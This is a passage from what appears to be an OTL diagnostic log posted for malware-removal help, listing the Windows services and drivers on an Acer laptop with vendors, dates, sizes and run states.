-- C:\Windows\SysNative\vaultsvc.dll -- (VaultSvc)SRV:[b]64bit:[/b] - [2013.08.22 11:31:03 | 000,201,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DeviceSetupManager.dll -- (DsmSvc)SRV:[b]64bit:[/b] - [2013.08.22 11:15:54 | 000,073,728 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\NcdAutoSetup.dll -- (NcdAutoSetup)SRV:[b]64bit:[/b] - [2013.08.07 22:40:08 | 000,182,752 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Windows\SysNative\mfevtps.exe -- (mfevtp)SRV:[b]64bit:[/b] - [2013.08.07 22:36:38 | 000,219,272 | ---- | M] () [Auto | Running] -- C:\ProgramFiles\Common Files\McAfee\SystemCore\\mfefire.exe -- (mfefire)

SRV:[b]64bit:[/b] - [2013.08.03 04:33:16 | 000,448,040 | ---- | M] (Acer Incorporate) [On_Demand |Running] -- C:\Program Files\Acer\Acer Quick Access\RMSvc.exe -- (RMSvc)SRV:[b]64bit:[/b] - [2013.08.03 04:33:14 | 000,457,768 | ---- | M] (Acer Incorporate) [On_Demand |Running] -- C:\Program Files\Acer\Acer Quick Access\QASvc.exe -- (QASvc)SRV:[b]64bit:[/b] - [2013.08.03 03:47:44 | 000,457,768 | ---- | M] (Acer Incorporate) [Auto | Running] -- C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe -- (LMSvc)SRV:[b]64bit:[/b] - [2013.07.06 02:19:04 | 000,663,592 | ---- | M] (Acer Incorporated) [On_Demand| Running] -- C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe -- (ePowerSvc)SRV:[b]64bit:[/b] - [2013.05.12 03:45:54 | 000,822,232 | ---- | M] (Intel(R) Corporation) [On_Demand | Stopped] -- C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe -- (Intel(R)SRV:[b]64bit:[/b] - [2013.05.12 03:45:38 | 000,733,696 | ---- | M] (Intel(R) Corporation) [Auto | Running] -- C:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel(R)SRV - [2014.07.30 15:03:59 | 000,119,408 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)SRV - [2014.07.08 19:56:11 | 000,262,320 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)SRV - [2014.06.26 21:48:30 | 003,053,312 | ---- | M] (Acer Incorporated) [Auto | Running] -- C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe -- (CCDMonitorService)SRV - [2014.04.24 23:04:16 | 000,227,904 | ---- | M] (WildTangent) [Auto | Running] -- C:\ProgramFiles (x86)\WildTangent Games\App\GamesAppIntegrationService.exe -- (GamesAppIntegrationService)SRV - [2014.04.24 23:00:06 | 000,203,344 | ---- | M] (WildTangent, Inc.) [On_Demand | Stopped] --C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe -- (GamesAppService)SRV - [2014.03.30 13:05:12 | 002,466,080 | ---- | M] (Conduit) [Disabled | Stopped] -- C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe -- (CltMngSvc)SRV - [2014.03.14 08:10:16 | 000,357,376 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\GeofenceMonitorService.dll -- (lfsvc)SRV - [2013.10.23 09:15:08 | 000,172,192 | ---- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)SRV - [2013.10.12 07:19:52 | 000,214,512 | ---- | M] (Kaspersky Lab ZAO) [Auto | Running] -- C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe -- (AVP)SRV - [2013.09.12 12:03:03 | 000,279,024 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)SRV - [2013.09.07 11:52:20 | 000,312,448 | ---- | M] (Windows (R) Win 7 DDK provider) [Auto | Running] -- C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\AdminService.exe -- (AtherosSvc)SRV - [2013.09.04 01:53:48 | 000,390,616 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)SRV - [2013.09.04 01:53:42 | 000,169,432 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe -- (jhi_service)SRV - [2013.08.22 14:31:56 | 002,899,968 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\system32\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)SRV - [2013.08.22 05:55:35 | 000,018,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\StorSvc.dll -- (StorSvc)SRV - [2013.08.22 04:53:34 | 000,011,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\smphost.dll -- (smphost)SRV - [2013.08.02 08:31:10 | 004,278,112 | ---- | M] (Symantec Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe -- (NOBU)SRV - [2012.07.14 01:27:00 | 000,769,432 | ---- | M] (Nero AG) [Auto | Running] -- C:\Program

Files (x86)\Nero\Update\NASvc.exe -- (NAUpdate) [color=#E56717]========== Driver Services (SafeList) ==========[/color] DRV:[b]64bit:[/b] - [2014.05.31 12:07:07 | 000,467,800 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Running] -- C:\Windows\SysNative\drivers\USBHUB3.SYS -- (USBHUB3)DRV:[b]64bit:[/b] - [2014.05.09 21:58:03 | 000,376,152 | ---- | M] (Microsoft Corporation) [Kernel |Boot | Running] -- C:\Windows\SysNative\drivers\clfs.sys -- (CLFS)DRV:[b]64bit:[/b] - [2014.05.09 21:55:49 | 000,226,304 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthLEEnum.sys -- (BthLEEnum)DRV:[b]64bit:[/b] - [2014.05.09 21:55:06 | 000,033,280 | ---- | M] (Microsoft Corporation) [Kernel |System | Running] -- C:\Windows\SysNative\drivers\BasicRender.sys -- (BasicRender)DRV:[b]64bit:[/b] - [2014.05.01 15:31:39 | 000,055,328 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wpcfltr.sys -- (wpcfltr)DRV:[b]64bit:[/b] - [2014.04.01 08:23:41 | 000,384,856 | ---- | M] (Microsoft Corporation) [Kernel |Boot | Running] -- C:\Windows\SysNative\drivers\spaceport.sys -- (spaceport)DRV:[b]64bit:[/b] - [2014.03.24 04:30:57 | 000,257,880 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdFilter.sys -- (WdFilter)DRV:[b]64bit:[/b] - [2014.03.24 04:30:57 | 000,123,224 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdNisDrv.sys -- (WdNisDrv)DRV:[b]64bit:[/b] - [2014.03.24 04:27:03 | 000,035,856 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdBoot.sys -- (WdBoot)DRV:[b]64bit:[/b] - [2014.03.20 20:06:15 | 000,625,760 | ---- | M] (Kaspersky Lab ZAO) [File_System | System | Running] -- C:\Windows\SysNative\drivers\klif.sys -- (KLIF)DRV:[b]64bit:[/b] - [2014.03.20 20:06:15 | 000,065,120 | ---- | M] (Kaspersky Lab ZAO) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\klwfp.sys -- (klwfp)DRV:[b]64bit:[/b] - [2014.03.16 08:40:19 | 000,178,272 | ---- | M] (Kaspersky Lab ZAO) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\kneps.sys -- (kneps)DRV:[b]64bit:[/b] - [2014.03.16 08:40:19 | 000,029,280 | ---- | M] (Kaspersky Lab ZAO) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\klkbdflt.sys -- (klkbdflt)DRV:[b]64bit:[/b] - [2014.03.16 08:40:18 | 000,458,336 | ---- | M] (Kaspersky Lab ZAO) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\kl1.sys -- (kl1)DRV:[b]64bit:[/b] - [2014.03.16 08:40:18 | 000,029,792 | ---- | M] (Kaspersky Lab) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\klelam.sys -- (klelam)DRV:[b]64bit:[/b] - [2014.03.13 14:35:24 | 000,157,016 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\wof.sys -- (Wof)DRV:[b]64bit:[/b] - [2014.03.08 22:40:16 | 000,136,024 | ---- | M] (Microsoft Corporation) [Kernel |Boot | Running] -- C:\Windows\SysNative\drivers\wfplwfs.sys -- (WFPLWFS)DRV:[b]64bit:[/b] - [2014.02.22 18:00:25 | 000,236,888 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)DRV:[b]64bit:[/b] - [2014.02.22 17:49:51 | 000,325,464 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Running] -- C:\Windows\SysNative\drivers\USBXHCI.SYS -- (USBXHCI)DRV:[b]64bit:[/b] - [2014.02.22 17:49:49 | 000,189,784 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Running] -- C:\Windows\SysNative\drivers\UCX01000.SYS -- (UCX01000)DRV:[b]64bit:[/b] - [2014.02.22 17:49:49 | 000,079,192 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdstor.sys -- (sdstor)DRV:[b]64bit:[/b] - [2014.02.22 17:49:47 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpioclx.sys -- (GPIOClx0101)DRV:[b]64bit:[/b] - [2014.02.22 17:44:13 | 000,924,504 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\refs.sys -- (ReFS)DRV:[b]64bit:[/b] - [2013.11.11 04:48:41 | 000,039,768 | ---- | M] (Microsoft Corporation) [Kernel |

Boot | Running] -- C:\Windows\SysNative\drivers\intelpep.sys -- (intelpep)DRV:[b]64bit:[/b] - [2013.11.01 13:39:53 | 000,086,872 | ---- | M] (Microsoft Corporation) [Kernel |Boot | Running] -- C:\Windows\SysNative\drivers\pdc.sys -- (pdc)DRV:[b]64bit:[/b] - [2013.10.26 03:54:32 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx2.sys -- (SerCx2)DRV:[b]64bit:[/b] - [2013.10.12 07:19:50 | 000,029,280 | ---- | M] (Kaspersky Lab ZAO) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\klmouflt.sys -- (klmouflt)DRV:[b]64bit:[/b] - [2013.10.12 07:19:48 | 000,030,304 | ---- | M] (Kaspersky Lab ZAO) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\klim6.sys -- (KLIM6)DRV:[b]64bit:[/b] - [2013.10.05 17:25:54 | 000,057,176 | ---- | M] (Microsoft Corporation) [Kernel |Boot | Stopped] -- C:\Windows\SysNative\drivers\stornvme.sys -- (stornvme)DRV:[b]64bit:[/b] - [2013.10.02 03:31:08 | 000,370,504 | ---- | M] (ELAN Microelectronics Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ETD.sys -- (ETD)DRV:[b]64bit:[/b] - [2013.09.14 16:06:57 | 000,175,960 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VerifierExt.sys -- (VerifierExt)DRV:[b]64bit:[/b] - [2013.09.09 19:41:07 | 000,449,528 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)DRV:[b]64bit:[/b] - [2013.09.09 19:35:40 | 004,170,752 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)DRV:[b]64bit:[/b] - [2013.09.07 11:29:14 | 000,594,120 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btfilter.sys -- (BtFilter)DRV:[b]64bit:[/b] - [2013.09.07 11:29:14 | 000,338,120 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btath_a2dp.sys -- (BTATH_A2DP)DRV:[b]64bit:[/b] - [2013.09.07 11:29:14 | 000,179,432 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btath_hcrp.sys -- (BTATH_HCRP)DRV:[b]64bit:[/b] - [2013.09.07 11:29:14 | 000,137,928 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btath_rcp.sys -- (BTATH_RCP)DRV:[b]64bit:[/b] - [2013.09.07 11:29:14 | 000,116,424 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btath_avdt.sys -- (btath_avdt)DRV:[b]64bit:[/b] - [2013.09.07 11:29:14 | 000,089,800 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btath_flt.sys -- (AthBTPort)DRV:[b]64bit:[/b] - [2013.09.07 11:29:14 | 000,077,464 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btath_lwflt.sys -- (BTATH_LWFLT)DRV:[b]64bit:[/b] - [2013.09.07 11:29:14 | 000,034,384 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_bus.sys -- (BTATH_BUS)DRV:[b]64bit:[/b] - [2013.09.04 01:53:44 | 000,099,288 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\TeeDriverx64.sys -- (MEIx64)DRV:[b]64bit:[/b] - [2013.08.30 12:05:34 | 000,356,056 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\RtsPStor.sys -- (RSPCIESTOR)DRV:[b]64bit:[/b] - [2013.08.23 00:51:12 | 000,039,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\intelaud.sys -- (intaud_WaveExtensible)DRV:[b]64bit:[/b] - [2013.08.23 00:51:12 | 000,026,008 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iwdbus.sys -- (iwdbus)DRV:[b]64bit:[/b] - [2013.08.22 21:11:06 | 000,027,488 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)DRV:[b]64bit:[/b] - [2013.08.22 21:11:03 | 000,037,216 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt)DRV:[b]64bit:[/b] - [2013.08.22 15:25:40 | 000,043,008 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Running] -- C:\Windows\SysNative\drivers\condrv.sys -- (condrv)DRV:[b]64bit:[/b] - [2013.08.22 15:25:40 | 000,030,048 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)

DRV:[b]64bit:[/b] - [2013.08.22 14:50:19 | 000,057,696 | ---- | M] (Microsoft Corporation) [Kernel |System | Stopped] -- C:\Windows\SysNative\drivers\dam.sys -- (dam)DRV:[b]64bit:[/b] - [2013.08.22 14:49:54 | 000,079,712 | ---- | M] (Microsoft Corporation) [Kernel |Boot | Running] -- C:\Windows\SysNative\drivers\acpiex.sys -- (acpiex)DRV:[b]64bit:[/b] - [2013.08.22 14:49:33 | 000,159,584 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM)DRV:[b]64bit:[/b] - [2013.08.22 14:43:49 | 000,063,840 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\mvumis.sys -- (mvumis)DRV:[b]64bit:[/b] - [2013.08.22 14:43:48 | 000,041,824 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpiowin32.sys -- (msgpiowin32)DRV:[b]64bit:[/b] - [2013.08.22 14:43:45 | 003,357,024 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)DRV:[b]64bit:[/b] - [2013.08.22 14:43:45 | 000,093,536 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)DRV:[b]64bit:[/b] - [2013.08.22 14:43:45 | 000,082,784 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sss.sys -- (LSI_SSS)DRV:[b]64bit:[/b] - [2013.08.22 14:43:45 | 000,064,352 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)DRV:[b]64bit:[/b] - [2013.08.22 14:43:44 | 000,081,760 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas3.sys -- (LSI_SAS3)DRV:[b]64bit:[/b] - [2013.08.22 14:43:41 | 000,782,176 | ---- | M] (PMC-Sierra) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\adp80xx.sys -- (ADP80XX)DRV:[b]64bit:[/b] - [2013.08.22 14:43:41 | 000,531,296 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)DRV:[b]64bit:[/b] - [2013.08.22 14:43:41 | 000,259,424 | ---- | M] (AMD Technologies Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)DRV:[b]64bit:[/b] - [2013.08.22 14:43:41 | 000,108,896 | ---- | M] (LSI) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\3ware.sys -- (3ware)DRV:[b]64bit:[/b] - [2013.08.22 14:43:41 | 000,079,200 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)DRV:[b]64bit:[/b] - [2013.08.22 14:43:40 | 000,114,016 | ---- | M] (Microsoft Corporation) [Kernel |Boot | Stopped] -- C:\Windows\SysNative\drivers\EhStorTcgDrv.sys -- (EhStorTcgDrv)DRV:[b]64bit:[/b] - [2013.08.22 14:43:40 | 000,082,784 | ---- | M] (Microsoft Corporation) [Kernel |Boot | Running] -- C:\Windows\SysNative\drivers\EhStorClass.sys -- (EhStorClass)DRV:[b]64bit:[/b] - [2013.08.22 14:43:40 | 000,025,952 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)DRV:[b]64bit:[/b] - [2013.08.22 14:43:34 | 000,305,504 | ---- | M] (VIA Corporation) [Kernel | Boot| Stopped] -- C:\Windows\SysNative\drivers\VSTXRAID.SYS -- (VSTXRAID)DRV:[b]64bit:[/b] - [2013.08.22 14:43:33 | 000,074,080 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uaspstor.sys -- (UASPStor)DRV:[b]64bit:[/b] - [2013.08.22 14:43:32 | 000,031,072 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)DRV:[b]64bit:[/b] - [2013.08.22 14:43:31 | 000,107,872 | ---- | M] (Microsoft Corporation) [Kernel |Boot | Stopped] -- C:\Windows\SysNative\drivers\storahci.sys -- (storahci)DRV:[b]64bit:[/b] - [2013.08.22 14:43:31 | 000,072,032 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SpbCx.sys -- (SpbCx)DRV:[b]64bit:[/b] - [2013.08.22 14:43:31 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx.sys -- (SerCx)DRV:[b]64bit:[/b] - [2013.08.22 14:39:15 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uefi.sys -- (UEFI)DRV:[b]64bit:[/b] - [2013.08.22 14:37:27 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpci.sys -- (vpci)

DRV:[b]64bit:[/b] - [2013.08.22 14:36:12 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WpdUpFltr.sys -- (WpdUpFltr)DRV:[b]64bit:[/b] - [2013.08.22 13:39:54 | 000,076,800 | ---- | M] (Microsoft Corporation) [Kernel |System | Running] -- C:\Windows\SysNative\drivers\ahcache.sys -- (ahcache)DRV:[b]64bit:[/b] - [2013.08.22 13:39:31 | 000,050,688 | ---- | M] (Microsoft Corporation) [Kernel |System | Running] -- C:\Windows\SysNative\drivers\BasicDisplay.sys -- (BasicDisplay)DRV:[b]64bit:[/b] - [2013.08.22 13:39:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HyperVideo.sys -- (HyperVideo)DRV:[b]64bit:[/b] - [2013.08.22 13:39:06 | 000,009,728 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshidumdf.sys -- (mshidumdf)DRV:[b]64bit:[/b] - [2013.08.22 13:38:58 | 000,010,752 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpitime.sys -- (acpitime)DRV:[b]64bit:[/b] - [2013.08.22 13:38:48 | 000,010,240 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpipagr.sys -- (acpipagr)DRV:[b]64bit:[/b] - [2013.08.22 13:38:39 | 000,036,992 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthAvrcpTg.sys -- (BthAvrcpTg)DRV:[b]64bit:[/b] - [2013.08.22 13:38:26 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Running] -- C:\Windows\SysNative\drivers\kdnic.sys -- (kdnic)DRV:[b]64bit:[/b] - [2013.08.22 13:38:23 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmgencounter.sys -- (gencounter)DRV:[b]64bit:[/b] - [2013.08.22 13:38:22 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel |System | Running] -- C:\Windows\SysNative\drivers\npsvctrig.sys -- (npsvctrig)DRV:[b]64bit:[/b] - [2013.08.22 13:38:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthhfHid.sys -- (bthhfhid)DRV:[b]64bit:[/b] - [2013.08.22 13:37:49 | 000,013,824 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hyperkbd.sys -- (hyperkbd)DRV:[b]64bit:[/b] - [2013.08.22 13:37:46 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)DRV:[b]64bit:[/b] - [2013.08.22 13:37:42 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bthhfenum.sys -- (BthHFEnum)DRV:[b]64bit:[/b] - [2013.08.22 13:37:28 | 000,056,320 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)DRV:[b]64bit:[/b] - [2013.08.22 13:37:28 | 000,041,472 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidi2c.sys -- (hidi2c)DRV:[b]64bit:[/b] - [2013.08.22 13:37:14 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)DRV:[b]64bit:[/b] - [2013.08.22 13:36:43 | 000,087,040 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netvsc63.sys -- (netvsc)DRV:[b]64bit:[/b] - [2013.08.22 13:36:25 | 000,016,384 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisVirtualBus.sys -- (NdisVirtualBus)DRV:[b]64bit:[/b] - [2013.08.22 13:36:17 | 000,124,928 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatform)DRV:[b]64bit:[/b] - [2013.08.22 13:36:07 | 000,066,560 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mslldp.sys -- (MsLldp)DRV:[b]64bit:[/b] - [2013.08.22 13:35:42 | 000,103,424 | ---- | M] (Microsoft Corporation) [Kernel |Auto | Running] -- C:\Windows\SysNative\drivers\Ndu.sys -- (Ndu)DRV:[b]64bit:[/b] - [2013.08.22 10:46:33 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel |On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fxppm.sys -- (FxPPM)DRV:[b]64bit:[/b] - [2013.08.16 06:13:30 | 003,859,968 | ---- | M] (Qualcomm Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athwbx.sys -- (athr)DRV:[b]64bit:[/b] - [2013.08.13 01:25:46 | 000,017,624 | ---- | M] (Windows (R) Win 7 DDK

provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bcmfn2.sys -- (bcmfn2)DRV:[b]64bit:[/b] - [2013.08.10 02:39:30 | 000,651,248 | ---- | M] (Intel Corporation) [Kernel | Boot| Stopped] -- C:\Windows\SysNative\drivers\iaStorAV.sys -- (iaStorAV)DRV:[b]64bit:[/b] - [2013.08.08 00:23:46 | 000,644,968 | ---- | M] (Intel Corporation) [Kernel | Boot| Running] -- C:\Windows\SysNative\drivers\iaStorA.sys -- (iaStorA)DRV:[b]64bit:[/b] - [2013.08.07 22:43:14 | 000,070,112 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\cfwids.sys -- (cfwids)DRV:[b]64bit:[/b] - [2013.08.07 22:40:20 | 000,343,568 | ---- | M] (McAfee, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\mfewfpk.sys -- (mfewfpk)DRV:[b]64bit:[/b] - [2013.08.07 22:38:20 | 000,776,168 | ---- | M] (McAfee, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\mfehidk.sys -- (mfehidk)DRV:[b]64bit:[/b] - [2013.08.07 22:37:02 | 000,519,064 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfefirek.sys -- (mfefirek)DRV:[b]64bit:[/b] - [2013.08.07 22:36:06 | 000,310,224 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfeavfk.sys -- (mfeavfk)DRV:[b]64bit:[/b] - [2013.08.07 22:35:44 | 000,179,664 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mfeapfk.sys -- (mfeapfk)DRV:[b]64bit:[/b] - [2013.08.07 22:20:04 | 000,069,264 | ---- | M] (McAfee, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\mfeelamk.sys -- (mfeelamk)DRV:[b]64bit:[/b] - [2013.07.30 20:47:35 | 000,024,568 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_GPIO.sys -- (iaLPSSi_GPIO)DRV:[b]64bit:[/b] - [2013.07.30 03:24:22 | 000,150,104 | R--- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NARAx64\0405000.009\ccSetx64.sys --(ccSet_NARA)DRV:[b]64bit:[/b] - [2013.07.25 21:05:39 | 000,099,320 | ---- | M] 